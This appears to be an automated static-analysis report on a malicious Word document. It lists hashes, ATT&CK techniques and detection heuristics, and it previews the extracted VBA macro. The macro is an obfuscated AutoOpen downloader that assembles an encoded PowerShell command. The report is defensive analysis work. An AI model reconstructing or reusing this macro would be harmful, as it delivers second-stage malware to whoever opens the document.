Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d70c68d2b293eb4a…

MALICIOUS

Office (OLE)

Size: 91.2 KB
Created: 2018-08-20 23:15:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 306d2aafe97a7d71c9094a16a9898dad
SHA-1: 1185ab140990ff436d2f657b69a3263eee6c91ca
SHA-256: d70c68d2b293eb4afd73dd4ee4bf3e01efe6189eb6d4ec2ad23bea67587a12ec
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file is a malicious Office document containing a VBA macro, indicated by the OLE_VBA_MACROS and OLE_VBA_AUTOOPEN heuristics. The macro appears to be obfuscated but contains strings that, when reconstructed, suggest it attempts to execute a PowerShell command. This is likely intended to download and run a second-stage payload, a common technique for malware delivery.

Heuristics (5)

  • ClamAV: Doc.Malware.Generic-6665590-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6665590-0
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    Document contains an AutoOpen macro, which Word runs automatically when the document is opened.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 43329 bytes
    SHA-256: 2bfc4de85498b0873e23d28a80e1d218bc3a9926453dcb300006c04b703ccb92
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "EzzcOWXo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zNfsPVjQYIuTH"
Function TSijcE()
On Error Resume Next
VarType Round(47782 / UiDBpz)
   IsArray 73757 / anEjSz
FCRjqN = "Md " + "/V^" + ":^oN^ ^" + " ^ ^ /" + "r " + CStr(Chr(ArrJmjcp + FsiPLLNMBD + 34 + PtZzsvZqT + MHZJlmpiWKqzf)) + " " + " Se" + "^T" + "    R^4" + "=p"
VarType CDate(rZdMbD)
   VarType 74346 + TEazl - 31026 + diNsu
   VarType Val(HzPfk)
zLfdnj = "^o" + "w^e" + "rs^" + "h^" + "e" + "/" + "/^ (e^ " + "^J^A" + "B" + "SAGg" + "AUA^A" + "^"
wwzGn = 31602 * QkVtk
   VarType 98614 * vvfoOu * 7304 + rbaJM
njnBwMfIiri = "9^" + "A^G^4A^" + "Z_" + "^B^3ACy" + "A" + "^b^w" + "^BiA" + "^G^o^A" + "^Z^_B" + "^jA:^_" + "^" + "A^" + "IA^"
IsArray CDec(190)
   VarType CVar(73650 + WsthLd)
   IsArray Sqr(59)
GRRMEh = "B^O^" + "A^GU^" + "Ad^A^" + "A^u^AFc" + "^A^Z^" + "_^Bi^A^" + "E^" + "MAb^A^" + "B" + "^p" + "A" + "^G^UA" + "bg^By"
IsArray CDbl(379021379)
Ewdwo = "^" + "A^D^" + "s" + "^A^JA^B" + "vAG" + "_^A_" + "^wA^9" + "^ACc" + "^A" + "^aA" + "By^A^:" + "_^AcA^" + "A^6"
IsArray FCrVnM * zhbwuO - 60031 + jIaShz
   IsArray 15204 / bjilo * KruMY / 87252
   IsArray wPBRUc * NQIUY - 44598 - mwlaaS
   wwzGn = CYAHFK - LRUzfd
fTzoHYDGEAi = "AC^8ALw" + "^BwAG^" + "M" + "^Acg" + "BjAG" + "^g^" + "Ab" + "^w^B^h^" + "AC^4" + "^A^" + "b^w" + "B,^A"
wwzGn = LwufMq - FKSai
   VarType 48469 * pScdk
   VarType HVINhl / HPvVch / Wazqz - kprkJF
NizYLWU = "GcA" + "^LwBO" + "AF^" + "U^" + "A" + "UABA^" + "A" + "G^g" + "AdA" + "B^y^"
IsArray 30497 / QVtLaB
   wwzGn = Tan(52936 * HLKRd * EcVTv / BqQqo)
IijDTQqSrsw = "A" + "^:A^A^" + "O^gAv^" + "AC8" + "A#_B" + "n^A^G" + "U^AbgB" + "^i" + "^A" + "^G^w^A" + "^#" + "_^"
wwzGn = Sin(10444236)
   wwzGn = CByte(666)
   wwzGn = Log(8)
zsNFAjPz = "Bj^AGsA" + "^agB" + "hA^G^" + "M^A^a" + "^wBz^A" + "GIAb^" + "w^B^" + "iAG^UA" + "^d^A^" + "A"
IsArray lSwrbG + ApRVu
   wwzGn = NzINdw - cMmvHW
   wwzGn = CDec(rYAjA)
uzQdUinPC = "^uAG4" + "A^Z^" + "_^By^AC" + "^8Ab_^B" + "_AE" + "A^A" + "a^" + "AByA:^" + "_Ac^A^" + "A^6^" + "A" + "C8^A" + "L^w^B^"
wwzGn = Cos(4073)
   wwzGn = ibNoUo - uDaEmi
   wwzGn = CDate(29297 * oodRS)
AnoKQnKUiS = "w^A" + "^G8Ac" + "g^" + "B^y^A^G" + "E^Ab" + "^" + "A^" + "B^" + "jAG8A" + "#_"
VarType QQOSDL + WSUEi / cfnzbW * kaXidX
   wwzGn = 61556 - wTvHEf * 21698 - cHTtiT
IPsWhIf = "Bj" + "A^G^g" + "^A^a^_" + "^B^u" + "^AG" + "c^A^Lg^" + "B/^A" + "^:^M^A" + "L^wBN"
IsArray TimeValue(zavIYU)
   wwzGn = CVar(DzjBps + 61823)
   wwzGn = 52795 + vkNwS / mNmkPY * jajQAb
SapXNLPN = "^A:^QA" + "_^w^BiA" + "G" + "Q^" + "A_^" + "wB#^" + "AGU" + "^A^" + "_" + "^AB^" + "o" + "A^:^_A" + "^d"
TSijcE = FCRjqN + zLfdnj + njnBwMfIiri + GRRMEh + Ewdwo + fTzoHYDGEAi + NizYLWU + IijDTQqSrsw + zsNFAjPz + uzQdUinPC + AnoKQnKUiS + IPsWhIf + SapXNLPN
   wwzGn = 76191 - wHMCv
   IsArray 19173 / BjoldL
End Function
Function WDNRLWzLoP()
On Error Resume Next
IsArray jucAGZ - 14756 - odjLFO * qpiMOL
KLPutUYzqi = "^A^B" + "^wA^Do" + "^AL" + "^" + "wAvA" + ":^o^A" + "^bw^At^" + "A:^IA" + "^#_"
wwzGn = thjlph / vKhAoi
   IsArray Val(EXsXn)
bQzJTEkCP = "B^Q^A^G" + "^" + "8^" + "A^b^_B" + "-^" + "A:^M" + "^A^b^A^"
IsArray CBool(hbVMR)
zhwriPvzj = "AuA^:A^" + "Ab^A^A" + "vA" + "GMAbw" + "B^t" + "A:A^A" + "b^w^Bu" + "^A" + "GUA" + "bg^By^A" + "^:^M" + "^A" + "L^w^B^"
wwzGn = Hex(DjChL)
   VarType Str(QdmdYd)
   IsArray Sqr(dFXvih)
QWtTZMfCqnY = "j^" + "A^G8^A" + "b^_B" + "^XA^" + ":A^AcgB" + "vA" + "^G#Ab^w" + "^" + "B^," + "^A^"
IsArray CDec(473)
   VarType cVKwR * isEFH * 69442 * qNdwC
iYkpv = "GyAc^w" + "Av^AGQ" + "^Ab^g^B" + "^jA" + "^" + "GwAd_B^" + "Q" + "A^GU" + "Ac" + "^w^AvA" + "EM^A" + "^" + "bgB^j"
WDNRLWzLoP = KLPutUYzqi + bQzJTEkCP + zhwriPvzj + QWtTZMfCqnY + iYkpv
   wwzGn = Int(3736)
   wwzGn = Val(37321 + GwMWZ)
   IsArray dDkN
... (truncated)